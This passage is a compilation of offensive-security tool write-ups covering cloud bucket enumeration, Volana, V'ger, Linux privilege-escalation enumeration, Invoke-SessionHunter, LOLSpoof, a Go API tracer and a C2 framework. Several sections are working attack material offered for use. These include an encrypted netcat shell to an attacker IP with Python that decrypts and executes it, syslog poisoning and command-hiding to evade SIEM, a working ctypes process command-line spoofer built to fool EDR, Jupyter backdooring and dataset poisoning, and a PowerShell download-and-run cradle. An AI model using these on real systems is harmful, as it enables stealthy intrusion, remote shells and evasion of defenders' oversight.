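environments = ["test", "dev", "prod", "stage", "staging", "bak"]
wordlist = ["assets", "backup", "files"]  # stand-in for ./data/*.txt entries

def mutations(keyword):
    for env in environments:
        yield f"{env}-{keyword}"
        yield f"{env}.{keyword}"
        yield f"{keyword}-{env}"
    for word in wordlist:
        yield f"{keyword}-{word}"

for name in mutations("target"):
    # e.g. each candidate becomes https://{name}.s3.amazonaws.com for
    # Amazon storage mode, and similar templates for the other providers
    print(name)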

We provide some wordlists out of the box, but it's better to customize and minimize your wordlists (based on your recon) before executing the tool.

    After setting up your API key, you are ready to use CloudBrute.

[ CloudBrute ASCII-art banner ]
    V 1.0.7
    usage: CloudBrute [-h|--help] -d|--domain "<value>" -k|--keyword "<value>"
    -w|--wordlist "<value>" [-c|--cloud "<value>"] [-t|--threads
    <integer>] [-T|--timeout <integer>] [-p|--proxy "<value>"]
    [-a|--randomagent "<value>"] [-D|--debug] [-q|--quite]
    [-m|--mode "<value>"] [-o|--output "<value>"]
    [-C|--configFolder "<value>"]

    Awesome Cloud Enumerator

    Arguments:

    -h --help Print help information
    -d --domain domain
    -k --keyword keyword used to generator urls
    -w --wordlist path to wordlist
    -c --cloud force a search, check config.yaml providers list
    -t --threads number of threads. Default: 80
    -T --timeout timeout per request in seconds. Default: 10
    -p --proxy use proxy list
    -a --randomagent user agent randomization
    -D --debug show debug logs. Default: false
    -q --quite suppress all output. Default: false
    -m --mode storage or app. Default: storage
    -o --output Output file. Default: out.txt
    -C --configFolder Config path. Default: config


For example:

    CloudBrute -d target.com -k target -m storage -t 80 -T 10 -w "./data/storage_small.txt"

Please note that the -k keyword is used to generate URLs, so if you want the full domain to be part of the mutation, use it for both the domain (-d) and keyword (-k) arguments.

If a cloud provider is not detected, or you want to force searching on a specific provider, you can use the -c option.

CloudBrute -d target.com -k keyword -m storage -t 80 -T 10 -w ./data/storage_small.txt -c amazon -o target_output.txt

    Dev

    • Clone the repo
    • go build -o CloudBrute main.go
    • go test internal

    in action

    How to contribute

• Add a module or fix something and then submit a pull request.
• Share it with whomever you believe can use it.
• Do the extra work and share your findings with the community ♥

    FAQ

    How to make the best out of this tool?

    Read the usage.

    I get errors; what should I do?

Make sure you read the usage correctly, and if you think you found a bug, open an issue.

    When I use proxies, I get too many errors, or it's too slow?

That's because you are using public proxies; use private, higher-quality proxies instead. You can use ProxyFor to verify the good proxies with your chosen provider.

Too fast or too slow?

Change the -T (timeout) option to get the best results for your run.

    Credits

Inspired by every single repo listed here.



    Volana - Shell Command Obfuscation To Avoid Detection Systems

    By: Unknown


Shell command obfuscation to avoid SIEM/detection systems

During a pentest, an important aspect is to be stealthy. For this reason you should clear your tracks after your passage. Nevertheless, many infrastructures log commands and send them to a SIEM in real time, making after-the-fact cleaning useless on its own.

volana provides a simple way to hide commands executed on a compromised machine by providing its own shell runtime (enter your command, volana executes it for you). This way you clear your tracks DURING your passage.


    Usage

You need to get an interactive shell (find a way to spawn it; you are a hacker, it's your job!). Then download volana on the target machine and launch it. That's it: now you can type the commands you want to be stealthily executed.

## Download it from the github release
## If you do not have internet access from the compromised machine, find another way
curl -LO https://github.com/ariary/volana/releases/latest/download/volana

    ## Execute it
    ./volana

    ## You are now under the radar
volana » echo "Hi SIEM team! Do you find me?" > /dev/null 2>&1 #you are allowed to be a bit cocky
volana » [command]

Keywords for the volana console:

• ring: enable ring mode, i.e. each command is launched along with plenty of others to cover tracks (against solutions that monitor system calls)
• exit: exit the volana console

    from non interactive shell

Imagine you have a non-interactive shell (webshell or blind RCE): you can use the encrypt and decrypt subcommands. First, you need to build volana with an embedded encryption key.

    On attacker machine

    ## Build volana with encryption key
    make build.volana-with-encryption

    ## Transfer it on TARGET (the unique detectable command)
    ## [...]

    ## Encrypt the command you want to stealthy execute
## (Here, a nc bindshell to obtain an interactive shell)
    volana encr "nc [attacker_ip] [attacker_port] -e /bin/bash"
    >>> ENCRYPTED COMMAND

Copy the encrypted command and execute it with your RCE on the target machine:

    ./volana decr [encrypted_command]
## Now you have a bindshell; spawn it to make it interactive and use volana as usual to stay stealthy (./volana). Don't forget to remove the volana binary before leaving (the decryption key can easily be retrieved from it)

Why not just hide the command with echo [command] | base64 and decode it on the target with echo [encoded_command] | base64 -d | bash?

Because we want to be protected against systems that trigger alerts on base64 use or that look for base64 text in commands. We also want to make investigation difficult, and base64 isn't a real obstacle.
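volana itself is a Go binary, but the embedded-key encrypt/decrypt idea sketches easily in Python; this uses the third-party cryptography package as a stand-in for whatever cipher volana actually uses:

import subprocess
from cryptography.fernet import Fernet

EMBEDDED_KEY = Fernet.generate_key()  # baked into the binary at build time

def encr(command):
    # Run on the attacker machine: the ciphertext is safe to paste through
    # a webshell or blind RCE without tripping base64/keyword alerts.
    return Fernet(EMBEDDED_KEY).encrypt(command.encode()).decode()

def decr(token):
    # Run on the target: decrypt and execute, so the clear-text command
    # never appears in the invoking command line.
    command = Fernet(EMBEDDED_KEY).decrypt(token.encode()).decode()
    subprocess.run(command, shell=True)

blob = encr("nc 10.0.0.1 4444 -e /bin/bash")  # hypothetical attacker IP/port
print(blob)
decr(blob)

The sketch also shows why the binary must be removed before leaving: the key ships inside it.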

    Detection

    Keep in mind that volana is not a miracle that will make you totally invisible. Its aim is to make intrusion detection and investigation harder.

By detected we mean being able to trigger an alert when a certain command has been executed.

    Hide from

Only the command line that launches volana will be caught. 🧠 However, if you add a space before it, the default bash behavior is not to save it.

• Detection systems based on history command output
• Detection systems based on history files
• .bash_history, .zsh_history, etc.
• Detection systems based on bash debug traps
• Detection systems based on the sudo built-in logging system
• Detection systems tracing all processes' syscalls system-wide (e.g. opensnoop)
• Terminal (tty) recorders (script, screen -L, sexonthebash, ovh-ttyrec, etc.)
• Easy to detect & avoid: pkill -9 script
• Not a common case
• screen is a bit more difficult to avoid; however, it does not register input (secret input: stty -echo => avoided)
• Command detection could be avoided with volana's encryption mode

    Visible for

• Detection systems that alert on unknown commands (the volana one)
• Detection systems based on keyloggers
• Easy to avoid: copy/paste commands
• Not a common case
• Detection systems based on syslog files (e.g. /var/log/auth.log)
• Only for sudo or su commands
• syslog files can be modified and thus poisoned as you wish (e.g. for /var/log/auth.log: logger -p auth.info "No hacker is poisoning your syslog solution, don't worry")
• Detection systems based on syscalls (e.g. auditd, LKML/eBPF)
• Difficult to analyze; can be made unreadable by making several diversion syscalls
• Custom LD_PRELOAD injection for logging
• Not a common case at all

    Bug bounty

Sorry for the clickbait title, but no money will be provided to contributors. 🐛

Let me know if you have found:

• a way to detect volana
• a way to spy on the console that doesn't detect volana commands
• a way to avoid a detection system

    Report here

    Credit



    PIP-INTEL - OSINT and Cyber Intelligence Tool

    By: Unknown



Pip-Intel is a powerful tool designed for OSINT (Open Source Intelligence) and cyber intelligence gathering activities. It consolidates various open-source tools into a single user-friendly interface, simplifying the data collection and analysis processes for researchers and cybersecurity professionals.

    Pip-Intel utilizes Python-written pip packages to gather information from various data points. This tool is equipped with the capability to collect detailed information through email addresses, phone numbers, IP addresses, and social media accounts. It offers a wide range of functionalities including email-based OSINT operations, phone number-based inquiries, geolocating IP addresses, social media and user analyses, and even dark web searches.




    Vger - An Interactive CLI Application For Interacting With Authenticated Jupyter Instances

    By: Zion3R

    V'ger is an interactive command-line application for post-exploitation of authenticated Jupyter instances with a focus on AI/ML security operations.

    User Stories

    • As a Red Teamer, you've found Jupyter credentials, but don't know what you can do with them. V'ger is organized in a format that should be intuitive for most offensive security professionals to help them understand the functionality of the target Jupyter server.
• As a Red Teamer, you know that some browser-based actions will be visible to the legitimate Jupyter users. For example, modifying tabs will appear in their workspace and commands entered in cells will be recorded to the history. V'ger decreases the likelihood of detection.
• As an AI Red Teamer, you understand academic algorithmic attacks, but need a more practical execution vector. For instance, you may need to modify a large, foundational internet-scale dataset as part of a model poisoning operation. Modifying that dataset at its source may be impossible or generate undesirable auditable artifacts. With V'ger you can achieve the same objectives in-memory, a significant improvement in tradecraft.
    • As a Blue Teamer, you want to understand logging and visibility into a live Jupyter deployment. V'ger can help you generate repeatable artifacts for testing instrumentation and performing incident response exercises.

    Usage

    Initial Setup

    1. pip install vger
    2. vger --help

    Currently, vger interactive has maximum functionality, maintaining state for discovered artifacts and recurring jobs. However, most functionality is also available by-name in non-interactive format with vger <module>. List available modules with vger --help.

    Commands

    Once a connection is established, users drop into a nested set of menus.

The top-level menu is:

• Reset: Configure a different host.
• Enumerate: Utilities to learn more about the host.
• Exploit: Utilities to perform direct action and manipulation of the host and artifacts.
• Persist: Utilities to establish persistence mechanisms.
• Export: Save output to a text file.
• Quit: No one likes quitters.

These menus contain the following functionality:

• List modules: Identify imported modules in target notebooks to determine what libraries are available for injected code.
• Inject: Execute code in the context of the selected notebook. Code can be provided in a text editor or by specifying a local .py file. Either input is processed as a string and executed in the runtime of the notebook.
• Backdoor: Launch a new JupyterLab instance open to 0.0.0.0, with allow-root, on a user-specified port with a user-specified password.
• Check History: See ipython commands recently run in the target notebook.
• Run shell command: Spawn a terminal, run the command, return the output, and delete the terminal.
• List dir or get file: List directories relative to the Jupyter directory. If you don't know, start with /.
• Upload file: Upload a file from localhost to the target. Specify paths in the same format as List dir (relative to the Jupyter directory). Provide a full path including filename and extension.
• Delete file: Delete a file. Specify paths in the same format as List dir (relative to the Jupyter directory).
• Find models: Find models based on common file formats.
• Download models: Download discovered models.
• Snoop: Monitor notebook execution and results until timeout.
• Recurring jobs: Launch/kill recurring snippets of code silently run in the target environment.
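None of this is magic: an authenticated Jupyter server exposes a REST API, and enumeration of this kind builds on calls like the following sketch (token authentication assumed; this is not V'ger's internal code):

import requests

BASE = "http://target:8888"  # hypothetical Jupyter server
HEADERS = {"Authorization": "token <stolen_token>"}

# Running notebooks and their kernels (feeds features like Inject and Snoop).
for s in requests.get(f"{BASE}/api/sessions", headers=HEADERS, timeout=10).json():
    print(s["path"], s["kernel"]["id"])

# The contents API lists paths relative to the Jupyter directory
# (the basis for "List dir or get file").
listing = requests.get(f"{BASE}/api/contents/", headers=HEADERS, timeout=10).json()
print([item["name"] for item in listing["content"]])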

    Experimental

With pip install vger[ai] you'll get LLM-generated summaries of notebooks in the target environment. These are meant to be rough translations for non-DS/AI folks to quickly triage whether (or which) notebooks are worth investigating further.

There was an inherent tradeoff between model size and ability, and that's something I'll continue to tinker with, but hopefully this is helpful for some more traditional security users. I'd love to see folks start prompt injecting their notebooks ("these are not the droids you're looking for").

    Examples



    Linux-Smart-Enumeration - Linux Enumeration Tool For Pentesting And CTFs With Verbosity Levels

    By: Zion3R


    First, a couple of useful oneliners ;)

    wget "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh" -O lse.sh;chmod 700 lse.sh
    curl "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh" -Lo lse.sh;chmod 700 lse.sh

    Note that since version 2.10 you can serve the script to other hosts with the -S flag!


    linux-smart-enumeration

    Linux enumeration tools for pentesting and CTFs

    This project was inspired by https://github.com/rebootuser/LinEnum and uses many of its tests.

Unlike LinEnum, lse tries to gradually expose the information depending on its importance from a privesc point of view.

    What is it?

    This shell script will show relevant information about the security of the local Linux system, helping to escalate privileges.

    From version 2.0 it is mostly POSIX compliant and tested with shellcheck and posh.

It can also monitor processes to discover recurrent program executions. It monitors while it is executing all the other tests, so you save some time. By default it monitors for 1 minute, but you can choose the watch time with the -p parameter.

    It has 3 levels of verbosity so you can control how much information you see.

    In the default level you should see the highly important security flaws in the system. The level 1 (./lse.sh -l1) shows interesting information that should help you to privesc. The level 2 (./lse.sh -l2) will just dump all the information it gathers about the system.

    By default it will ask you some questions: mainly the current user password (if you know it ;) so it can do some additional tests.

    How to use it?

    The idea is to get the information gradually.

First you should execute it just like ./lse.sh. If you see some green yes!, you probably already have some good stuff to work with.

    If not, you should try the level 1 verbosity with ./lse.sh -l1 and you will see some more information that can be interesting.

If that does not help, level 2 will just dump everything you can gather about the service using ./lse.sh -l2. In this case you might find it useful to use ./lse.sh -l2 | less -r.

    You can also select what tests to execute by passing the -s parameter. With it you can select specific tests or sections to be executed. For example ./lse.sh -l2 -s usr010,net,pro will execute the test usr010 and all the tests in the sections net and pro.

    Use: ./lse.sh [options]

    OPTIONS
    -c Disable color
    -i Non interactive mode
    -h This help
    -l LEVEL Output verbosity level
    0: Show highly important results. (default)
    1: Show interesting results.
    2: Show all gathered information.
    -s SELECTION Comma separated list of sections or tests to run. Available
    sections:
    usr: User related tests.
    sud: Sudo related tests.
    fst: File system related tests.
    sys: System related tests.
    sec: Security measures related tests.
ret: Recurrent tasks (cron, timers) related tests.
    net: Network related tests.
    srv: Services related tests.
    pro: Processes related tests.
    sof: Software related tests.
    ctn: Container (docker, lxc) related tests.
    cve: CVE related tests.
    Specific tests can be used with their IDs (i.e.: usr020,sud)
    -e PATHS Comma separated list of paths to exclude. This allows you
    to do faster scans at the cost of completeness
    -p SECONDS Time that the process monitor will spend watching for
    processes. A value of 0 will disable any watch (default: 60)
    -S Serve the lse.sh script in this host so it can be retrieved
    from a remote host.

    Is it pretty?

    Usage demo

    Also available in webm video


    Level 0 (default) output sample


    Level 1 verbosity output sample


    Level 2 verbosity output sample


    Examples

    Direct execution oneliners

    bash <(wget -q -O - "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh") -l2 -i
    bash <(curl -s "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh") -l1 -i


    Invoke-SessionHunter - Retrieve And Display Information About Active User Sessions On Remote Computers (No Admin Privileges Required)

    By: Zion3R


    Retrieve and display information about active user sessions on remote computers. No admin privileges required.

    The tool leverages the remote registry service to query the HKEY_USERS registry hive on the remote computers. It identifies and extracts Security Identifiers (SIDs) associated with active user sessions, and translates these into corresponding usernames, offering insights into who is currently logged in.

If the -CheckAsAdmin switch is provided, it will gather sessions by authenticating to targets where you have local admin access using Invoke-WMIRemoting (which will most likely retrieve more results).

It's important to note that the Remote Registry service needs to be running on the remote computer for the tool to work effectively. In my tests, if the service is stopped but its startup type is configured to "Automatic" or "Manual", the service will start automatically on the target computer once queried (this is native behavior), and session information will be retrieved. If it is set to "Disabled", no session information can be retrieved from the target.
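The registry trick itself is easy to reproduce. Below is a Windows-only Python sketch of the same idea using only the standard library; the SID-to-username translation that the tool performs is omitted, and DC01 is a hypothetical target:

import winreg

def remote_session_sids(host):
    # Connect to HKEY_USERS on the remote host via the Remote Registry service.
    hive = winreg.ConnectRegistry(rf"\\{host}", winreg.HKEY_USERS)
    sids, i = [], 0
    while True:
        try:
            name = winreg.EnumKey(hive, i)
        except OSError:  # no more subkeys
            break
        # Interactive sessions show up as S-1-5-21-... (skip the *_Classes keys).
        if name.startswith("S-1-5-21-") and not name.endswith("_Classes"):
            sids.append(name)
        i += 1
    return sids

print(remote_session_sids("DC01"))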


    Usage:

    iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/Leo4j/Invoke-SessionHunter/main/Invoke-SessionHunter.ps1')

    If run without parameters or switches it will retrieve active sessions for all computers in the current domain by querying the registry

    Invoke-SessionHunter

    Gather sessions by authenticating to targets where you have local admin access

    Invoke-SessionHunter -CheckAsAdmin

    You can optionally provide credentials in the following format

    Invoke-SessionHunter -CheckAsAdmin -UserName "ferrari\Administrator" -Password "P@ssw0rd!"

    You can also use the -FailSafe switch, which will direct the tool to proceed if the target remote registry becomes unresponsive.

This works in combination with -Timeout | Default = 2; increase it for slower networks.

    Invoke-SessionHunter -FailSafe
    Invoke-SessionHunter -FailSafe -Timeout 5

    Use the -Match switch to show only targets where you have admin access and a privileged user is logged in

    Invoke-SessionHunter -Match

    All switches can be combined

    Invoke-SessionHunter -CheckAsAdmin -UserName "ferrari\Administrator" -Password "P@ssw0rd!" -FailSafe -Timeout 5 -Match

    Specify the target domain

    Invoke-SessionHunter -Domain contoso.local

    Specify a comma-separated list of targets or the full path to a file containing a list of targets - one per line

    Invoke-SessionHunter -Targets "DC01,Workstation01.contoso.local"
    Invoke-SessionHunter -Targets c:\Users\Public\Documents\targets.txt

    Retrieve and display information about active user sessions on servers only

    Invoke-SessionHunter -Servers

    Retrieve and display information about active user sessions on workstations only

    Invoke-SessionHunter -Workstations

    Show active session for the specified user only

    Invoke-SessionHunter -Hunt "Administrator"

Include localhost in the sessions retrieval

    Invoke-SessionHunter -IncludeLocalHost

    Return custom PSObjects instead of table-formatted results

    Invoke-SessionHunter -RawResults

Do not run a port scan to enumerate alive hosts before trying to retrieve sessions

    Note: if a host is not reachable it will hang for a while

    Invoke-SessionHunter -NoPortScan


    LOLSpoof - An Interactive Shell To Spoof Some LOLBins Command Line

    By: Zion3R


LOLSpoof is an interactive shell program that automatically spoofs the command-line arguments of the spawned process. Just call your incriminating-looking command line LOLBin (e.g. powershell -w hidden -enc ZwBlAHQALQBwAHIAbwBjAGUA....) and LOLSpoof will ensure that the process creation telemetry appears legitimate and clean.


    Why

The process command line is a heavily monitored telemetry source, thoroughly inspected by AV/EDRs, SOC analysts, and threat hunters.

    How

    1. Prepares the spoofed command line out of the real one: lolbin.exe " " * sizeof(real arguments)
    2. Spawns that suspended LOLBin with the spoofed command line
    3. Gets the remote PEB address
    4. Gets the address of RTL_USER_PROCESS_PARAMETERS struct
    5. Gets the address of the command line unicode buffer
    6. Overrides the fake command line with the real one
7. Resumes the main thread (a toy sketch of these steps follows)
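As a toy x64-only illustration of those steps in Python/ctypes (LOLSpoof itself is written in Nim; the ProcessParameters offset 0x20 in the PEB and the CommandLine offset 0x70 are hardcoded x64 assumptions):

import ctypes
from ctypes import wintypes

kernel32, ntdll = ctypes.windll.kernel32, ctypes.windll.ntdll

class STARTUPINFO(ctypes.Structure):
    _fields_ = [("cb", wintypes.DWORD), ("lpReserved", wintypes.LPWSTR),
                ("lpDesktop", wintypes.LPWSTR), ("lpTitle", wintypes.LPWSTR),
                ("dwX", wintypes.DWORD), ("dwY", wintypes.DWORD),
                ("dwXSize", wintypes.DWORD), ("dwYSize", wintypes.DWORD),
                ("dwXCountChars", wintypes.DWORD), ("dwYCountChars", wintypes.DWORD),
                ("dwFillAttribute", wintypes.DWORD), ("dwFlags", wintypes.DWORD),
                ("wShowWindow", wintypes.WORD), ("cbReserved2", wintypes.WORD),
                ("lpReserved2", ctypes.c_void_p), ("hStdInput", wintypes.HANDLE),
                ("hStdOutput", wintypes.HANDLE), ("hStdError", wintypes.HANDLE)]

class PROCESS_INFORMATION(ctypes.Structure):
    _fields_ = [("hProcess", wintypes.HANDLE), ("hThread", wintypes.HANDLE),
                ("dwProcessId", wintypes.DWORD), ("dwThreadId", wintypes.DWORD)]

class PBI(ctypes.Structure):  # PROCESS_BASIC_INFORMATION
    _fields_ = [("Reserved1", ctypes.c_void_p), ("PebBaseAddress", ctypes.c_void_p),
                ("Reserved2", ctypes.c_void_p * 2), ("UniqueProcessId", ctypes.c_void_p),
                ("Reserved3", ctypes.c_void_p)]

real = 'powershell -w hidden -c "whoami"'
fake = "powershell".ljust(len(real))            # step 1: pad with spaces

si, pi = STARTUPINFO(), PROCESS_INFORMATION()
si.cb = ctypes.sizeof(si)
kernel32.CreateProcessW(None, ctypes.create_unicode_buffer(fake), None, None,
                        False, 0x4, None, None,  # 0x4 = CREATE_SUSPENDED (step 2)
                        ctypes.byref(si), ctypes.byref(pi))

pbi = PBI()
ntdll.NtQueryInformationProcess(pi.hProcess, 0, ctypes.byref(pbi),
                                ctypes.sizeof(pbi), None)  # step 3: remote PEB

def read_ptr(addr):
    # Read one 8-byte pointer out of the child process.
    buf = ctypes.c_void_p()
    kernel32.ReadProcessMemory(pi.hProcess, ctypes.c_void_p(addr),
                               ctypes.byref(buf), 8, None)
    return buf.value

params = read_ptr(pbi.PebBaseAddress + 0x20)   # step 4: ProcessParameters
cmdline = read_ptr(params + 0x70 + 8)          # step 5: CommandLine.Buffer

kernel32.WriteProcessMemory(pi.hProcess, ctypes.c_void_p(cmdline),
                            ctypes.create_unicode_buffer(real),
                            len(real) * 2, None)  # step 6: swap in the real args
kernel32.ResumeThread(pi.hThread)                 # step 7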

    Opsec considerations

Although this simple technique helps to bypass command-line detection, it may introduce other suspicious telemetry:

1. Creation of a suspended process
2. The new process has trailing spaces (but it's really easy to make it a repeated character or even random data instead)
3. Write to the spawned process with WriteProcessMemory

    Build

    Built with Nim 1.6.12 (compiling with Nim 2.X yields errors!)

    nimble install winim

    Known issue

Programs that clear or change previously printed console messages (such as timeout.exe 10) break the program. When such commands are employed, you'll need to restart the console. I don't know how to fix that and am open to suggestions.



    Gftrace - A Command Line Windows API Tracing Tool For Golang Binaries

    By: Zion3R


    A command line Windows API tracing tool for Golang binaries.

Note: This tool is a PoC and a work-in-progress prototype, so please treat it as such. Feedback is always welcome!


How does it work?

Although Golang programs contain a lot of nuances regarding the way they are built and their behavior at runtime, they still need to interact with the OS layer, and that means at some point they need to call functions from the Windows API.

The Go runtime package contains a function called asmstdcall, and this function is a kind of "gateway" used to interact with the Windows API. Since this function is expected to call the Windows API functions, we can assume it needs access to information such as the address of the function and its parameters, and this is where things start to get more interesting.

Asmstdcall receives a single parameter, which is a pointer to something similar to the following structure:

    struct LIBCALL {
    DWORD_PTR Addr;
    DWORD Argc;
    DWORD_PTR Argv;
    DWORD_PTR ReturnValue;

    [...]
    }

Some of these fields are filled in after the API function is called, like the return value; others are received by asmstdcall, like the function address, the number of arguments, and the list of arguments. Regardless of when they are set, it's clear that the asmstdcall function manipulates a lot of interesting information regarding the execution of programs compiled in Golang.

gftrace leverages asmstdcall and the way it works to monitor specific fields of the mentioned struct and log them to the user. The tool is capable of logging the function name, its parameters, and also the return value of each Windows function called by a Golang application, all with no need to hook a single API function or have a signature for it.

    The tool also tries to ignore all the noise from the Go runtime initialization and only log functions called after it (i.e. functions from the main package).

    If you want to know more about this project and research check the blogpost.

    Installation

    Download the latest release.

    Usage

    1. Make sure gftrace.exe, gftrace.dll and gftrace.cfg are in the same directory.
    2. Specify which API functions you want to trace in the gftrace.cfg file (the tool does not work without API filters applied).
    3. Run gftrace.exe passing the target Golang program path as a parameter.
    gftrace.exe <filepath> <params>

    Configuration

    All you need to do is specify which functions you want to trace in the gftrace.cfg file, separating it by comma with no spaces:

    CreateFileW,ReadFile,CreateProcessW

The exact Windows API functions a Golang method X of a package Y would call in a specific scenario can only be determined either by analyzing the method itself or by trying to guess it. There are some interesting characteristics that can help: for example, Golang applications seem to always prefer functions from the "Wide" and "Ex" sets (e.g. CreateFileW, CreateProcessW, GetComputerNameExW, etc.), so you can consider that during your analysis.

The default config file contains multiple functions which I have already tested (at least most of them) and can say for sure can be called by a Golang application at some point. I'll try to update it eventually.

    Examples

    Tracing CreateFileW() and ReadFile() in a simple Golang file that calls "os.ReadFile" twice:

    - CreateFileW("C:\Users\user\Desktop\doc.txt", 0x80000000, 0x3, 0x0, 0x3, 0x1, 0x0) = 0x168 (360)
    - ReadFile(0x168, 0xc000108000, 0x200, 0xc000075d64, 0x0) = 0x1 (1)
    - CreateFileW("C:\Users\user\Desktop\doc2.txt", 0x80000000, 0x3, 0x0, 0x3, 0x1, 0x0) = 0x168 (360)
    - ReadFile(0x168, 0xc000108200, 0x200, 0xc000075d64, 0x0) = 0x1 (1)

    Tracing CreateProcessW() in the TunnelFish malware:

    - CreateProcessW("C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell /c "Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn; Get-Recipient | Select Name -ExpandProperty EmailAddresses -first 1 | Select SmtpAddress |  ft -hidetableheaders"", 0x0, 0x0, 0x1, 0x80400, "=C:=C:\Users\user\Desktop", 0x0, 0xc0000ace98, 0xc0000acd68) = 0x1 (1)
    - CreateProcessW("C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell /c "Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn; Get-Recipient | Select Name -ExpandProperty EmailAddresses -first 1 | Select SmtpAddress | ft -hidetableheaders"", 0x0, 0x0, 0x1, 0x80400, "=C:=C:\Users\user\Desktop", 0x0, 0xc0000c4ec8, 0xc0000c4d98) = 0x1 (1)
    - CreateProcessW("C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell /c "Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn; Get-Recipient | Select Name -ExpandProperty EmailAddresses -first 1 | Select SmtpAddres s | ft -hidetableheaders"", 0x0, 0x0, 0x1, 0x80400, "=C:=C:\Users\user\Desktop", 0x0, 0xc00005eec8, 0xc00005ed98) = 0x1 (1)
    - CreateProcessW("C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell /c "Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn; Get-Recipient | Select Name -ExpandProperty EmailAddresses -first 1 | Select SmtpAddress | ft -hidetableheaders"", 0x0, 0x0, 0x1, 0x80400, "=C:=C:\Users\user\Desktop", 0x0, 0xc0000bce98, 0xc0000bcd68) = 0x1 (1)
    - CreateProcessW("C:\WINDOWS\system32\cmd.exe", "cmd /c "wmic computersystem get domain"", 0x0, 0x0, 0x1, 0x80400, "=C:=C:\Users\user\Desktop", 0x0, 0xc0000c4ef0, 0xc0000c4dc0) = 0x1 (1)
    - CreateProcessW("C:\WINDOWS\system32\cmd.exe", "cmd /c "wmic computersystem get domain"", 0x0, 0x0, 0x1, 0x80400, "=C:=C:\Users\user\Desktop", 0x0, 0xc0000acec0, 0xc0000acd90) = 0x1 (1)
    - CreateProcessW("C:\WINDOWS\system32\cmd.exe", "cmd /c "wmic computersystem get domain"", 0x0, 0x0, 0x1, 0x80400, "=C:=C:\Users\user\Desktop", 0x0, 0xc0000bcec0, 0xc0000bcd90) = 0x1 (1)

    [...]

    Tracing multiple functions in the Sunshuttle malware:

    - CreateFileW("config.dat.tmp", 0x80000000, 0x3, 0x0, 0x3, 0x1, 0x0) = 0xffffffffffffffff (-1)
    - CreateFileW("config.dat.tmp", 0xc0000000, 0x3, 0x0, 0x2, 0x80, 0x0) = 0x198 (408)
    - CreateFileW("config.dat.tmp", 0xc0000000, 0x3, 0x0, 0x3, 0x80, 0x0) = 0x1a4 (420)
    - WriteFile(0x1a4, 0xc000112780, 0xeb, 0xc0000c79d4, 0x0) = 0x1 (1)
    - GetAddrInfoW("reyweb.com", 0x0, 0xc000031f18, 0xc000031e88) = 0x0 (0)
    - WSASocketW(0x2, 0x1, 0x0, 0x0, 0x0, 0x81) = 0x1f0 (496)
    - WSASend(0x1f0, 0xc00004f038, 0x1, 0xc00004f020, 0x0, 0xc00004eff0, 0x0) = 0x0 (0)
    - WSARecv(0x1f0, 0xc00004ef60, 0x1, 0xc00004ef48, 0xc00004efd0, 0xc00004ef18, 0x0) = 0xffffffff (-1)
    - GetAddrInfoW("reyweb.com", 0x0, 0xc000031f18, 0xc000031e88) = 0x0 (0)
    - WSASocketW(0x2, 0x1, 0x0, 0x0, 0x0, 0x81) = 0x200 (512)
    - WSASend(0x200, 0xc00004f2b8, 0x1, 0xc00004f2a0, 0x0, 0xc00004f270, 0x0) = 0x0 (0)
    - WSARecv(0x200, 0xc00004f1e0, 0x1, 0xc00004f1c8, 0xc00004f250, 0xc00004f198, 0x0) = 0xffffffff (-1)

    [...]

    Tracing multiple functions in the DeimosC2 framework agent:

    - WSASocketW(0x2, 0x1, 0x0, 0x0, 0x0, 0x81) = 0x130 (304)
    - setsockopt(0x130, 0xffff, 0x20, 0xc0000b7838, 0x4) = 0xffffffff (-1)
    - socket(0x2, 0x1, 0x6) = 0x138 (312)
    - WSAIoctl(0x138, 0xc8000006, 0xaf0870, 0x10, 0xb38730, 0x8, 0xc0000b746c, 0x0, 0x0) = 0x0 (0)
    - GetModuleFileNameW(0x0, "C:\Users\user\Desktop\samples\deimos.exe", 0x400) = 0x2f (47)
    - GetUserProfileDirectoryW(0x140, "C:\Users\user", 0xc0000b7a08) = 0x1 (1)
    - LookupAccountSidw(0x0, 0xc00000e250, "user", 0xc0000b796c, "DESKTOP-TEST", 0xc0000b7970, 0xc0000b79f0) = 0x1 (1)
    - NetUserGetInfo("DESKTOP-TEST", "user", 0xa, 0xc0000b7930) = 0x0 (0)
    - GetComputerNameExW(0x5, "DESKTOP-TEST", 0xc0000b7b78) = 0x1 (1)
    - GetAdaptersAddresses(0x0, 0x10, 0x0, 0xc000120000, 0xc0000b79d0) = 0x0 (0)
    - CreateToolhelp32Snapshot(0x2, 0x0) = 0x1b8 (440)
    - GetCurrentProcessId() = 0x2584 (9604)
    - GetCurrentDirectoryW(0x12c, "C:\Users\user\AppData\Local\Programs\retoolkit\bin") = 0x39 (57 )

    [...]

    Future features:

    • [x] Support inspection of 32 bits files.
    • [x] Add support to files calling functions via the "IAT jmp table" instead of the API call directly in asmstdcall.
    • [x] Add support to cmdline parameters for the target process
• [ ] Send the tracing log output to a file by default to make filtering easier. Currently there's no separation between the target file's output and gftrace's output; an alternative is to redirect gftrace output to a file using the command line.

⚠️ Warning

• The tool inspects the target binary dynamically, which means the file being traced is executed. If you're inspecting malware or unknown software, please make sure you do it in a controlled environment.
• Golang programs can be very noisy depending on the file and/or function being traced (e.g. VirtualAlloc is always called multiple times by the runtime package, CreateFileW is called multiple times before a call to CreateProcessW, etc). The tool ignores the Golang runtime initialization noise, but after that it's up to the user to decide which functions are better to filter in each scenario.

    License

    The gftrace is published under the GPL v3 License. Please refer to the file named LICENSE for more information.



    C2-Cloud - The C2 Cloud Is A Robust Web-Based C2 Framework, Designed To Simplify The Life Of Penetration Testers

    By: Zion3R


    The C2 Cloud is a robust web-based C2 framework, designed to simplify the life of penetration testers. It allows easy access to compromised backdoors, just like accessing an EC2 instance in the AWS cloud. It can manage several simultaneous backdoor sessions with a user-friendly interface.

